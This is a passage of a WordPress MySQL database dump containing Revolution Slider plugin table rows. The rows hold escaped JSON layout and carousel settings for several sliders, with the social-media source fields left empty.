2','slider-2','{\"addOns\":[],\"version\":\"6.6.0\",\"shortcode\":\"[rev_slider alias=\\\"slider-2\\\"][\\/rev_slider]\",\"type\":\"carousel\",\"layouttype\":\"fullwidth\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":55,\"maxPosts\":30,\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":1200,\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":300,\"delay\":9000,\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":10000,\"ease\":\"none\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":false,\"t\":false,\"m\":false},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":0,\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1240,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":900,\"n\":768,\"t\":960,\"m\":720},\"editorCache\":{\"d\":900,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"maxOpacity\":100,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":800,\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":\"false\"},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":0,\"dottedOverlay\":\"none\",\"shadow\":0,\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#ffffff\",\"type\":\"0\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":0,\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":1,\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false},\"progressbar\":{\"set\":false,\"height\":5,\"position\":\"bottom\",\"color\":\"rgba(255,255,255,0.5)\"},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":1},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":50,\"height\":100},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":\"off\",\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":\"1000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"2000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"4000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"3000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":0,\"offsetY\":20,\"align\":\"slider\",\"space\":5,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":0,\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[5,10,15,20,25,30,35,40,45,46,47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":0,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slidercenter\",\"type\":\"scroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\"},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":10,\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":30},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"none\",\"speed\":500},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\"},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\"},{\"alias\":\"Content Text\",\"v\":\"#00ffff\"}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"slider-2\\\"][\\/rev_slider]\"}','{\"version\":\"6.6.0\"}',''),(17,'Slider 3','slider-3','{\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(18,'Slider 4','slider-4','{\"addOns\":[],\"version\":\"6.6.0\",\"shortcode\":\"[rev_slider alias=\\\"slider-4\\\"][\\/rev_slider]\",\"type\":\"carousel\",\"layouttype\":\"auto\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":55,\"maxPosts\":30,\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":1200,\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":300,\"delay\":9000,\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":10000,\"ease\":\"none\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":false,\"t\":false,\"m\":false},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":0,\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1240,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":\"600px\",\"n\":768,\"t\":960,\"m\":720},\"editorCache\":{\"d\":600,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"maxOpacity\":100,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":\"200ms\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":\"false\"},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":0,\"dottedOverlay\":\"none\",\"shadow\":0,\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#ffffff\",\"type\":\"0\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":0,\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":1,\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false},\"progressbar\":{\"set\":false,\"height\":5,\"position\":\"bottom\",\"color\":\"rgba(255,255,255,0.5)\"},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":1},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":50,\"height\":100},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":\"off\",\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":\"1000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"2000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"4000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"3000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":0,\"offsetY\":20,\"align\":\"slider\",\"space\":5,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":0,\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[5,10,15,20,25,30,35,40,45,46,47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":0,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slidercenter\",\"type\":\"scroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\"},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":10,\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":30},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"none\",\"speed\":500},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\",\"ref\":[]},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\",\"ref\":[]},{\"alias\":\"Content Text\",\"v\":\"#00ffff\",\"ref\":[]}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"slider-4\\\"][\\/rev_slider]\"}','{\"version\":\"6.6.0\"}',''); /*!40000 ALTER TABLE `wpvt_revslider_sliders` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_sliders_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_sliders_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_sliders_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `title` tinytext NOT NULL, `alias` tinytext DEFAULT NULL, `params` longtext NOT NULL, `settings` text DEFAULT NULL, `type` varchar(191) NOT NULL DEFAULT '', UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_sliders_bkp` -- LOCK TABLES `wpvt_revslider_sliders_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_sliders_bkp` DISABLE KEYS */; INSERT INTO `wpvt_revslider_sliders_bkp` (`id`, `title`, `alias`, `params`, `settings`, `type`) VALUES (1,'cinnamon','cinnamon','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\"cinnamon\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":1100,\"n\":950,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#f7f7f7\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":{},\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offse